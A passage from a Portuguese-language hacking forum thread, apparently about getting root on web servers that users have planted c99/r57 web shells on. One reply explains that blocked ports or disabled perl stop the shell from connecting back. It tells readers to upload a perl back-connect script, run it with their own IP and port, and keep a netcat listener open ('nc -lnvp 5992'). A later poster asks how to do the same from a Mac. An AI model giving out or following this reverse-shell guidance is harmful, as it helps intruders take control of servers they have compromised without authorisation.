Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Ajuda] Problema em dar root

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    Mais um conselho, para de usar IE e habilita teu firewall brother '-' ! até mais
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.

    Comment


    • Font Size
      #17
      Postado Originalmente por n4sss Ver Post
      Olaa a todos,

      Xips meu querido, o problema não é no seu roteador modem ou pc.

      Se ja liberou as portas e continua com isso o que simplesmente esta ocorrendo no servidor é uma interrupção se serviço por porta (: .

      Mas n4sss o que seria uma interrupção de serviço por porta?

      A empresa administradora do servidor, adiciono excessoes no roteador scsi ou qualquer outro aparelho na maquina a partir do iptables (regras de firewall e ip)

      assim não conseguimos conexão com o servidor, o que muito acontece tbm é do perl ta desativado no servidor, então me perguntam o que o perl tem a ver com isso? :O

      O perl é o interpretador usado pelas c99 e r57's para estabelecerem conexao com o backdoor, sao usados sockets de conexao para este fim, como muitos podem perceber em algumas shells podemos escolher conexao por perl ou c.

      Então resumindo, nao há jeito para conexão, tente outro back connect como por exemplo o que criei em perl:



      Salve em .txt upe no servidor e faça:

      perl n4sss.txt seuip porta

      e no seu prompt deixe o netcat escutando

      nc -lnvp 5992

      Abraço.

      Qualquer duvida manda mp, que a gente conversa.

      Ola Amigo, desculpas eu estar usando o topico do outro rapaz aqui, so que eu tenho o mesmo problema que ele, e eu também uso o seu perl, bom eu ja desisti de tentar me conectar pelo netcat no windows, agora estou querendo saber se existe alguma forma de fazer esse back connection pelo Mac?
      Ops: ja estava esquecendo, o meu routiador ele nao deixa eu abrir as ports ! Parece ate sacanagem so que eu coloco qualquer ports nele, e quando vou fazer um check nesses sites que mostram se as portas estão abertas eles sempre dizem que estão fechadas! risosss so me ferro nessa vida! modelo do meu rotiador Motorola SBG6580 SURFboard® DOCSIS 3.0.

      Peace!
      Ola a todos , deixa eu me apresentar, sou um cientista que construí uma maquina do tempo , fiz algumas viagem para o futuro e para o passado, infelizmente quando fiz essa minha ultima viagem do tempo para o passado exato no ano de 2012 minha maquina teve um problema com plutonismo, e fiquei preso nesse civilização atrasada.

      Acredite viajar no tempo é possível sim!
      Preciso de ajuda dos mas avançados de sua civilização.

      Comment

      X
      Working...
      X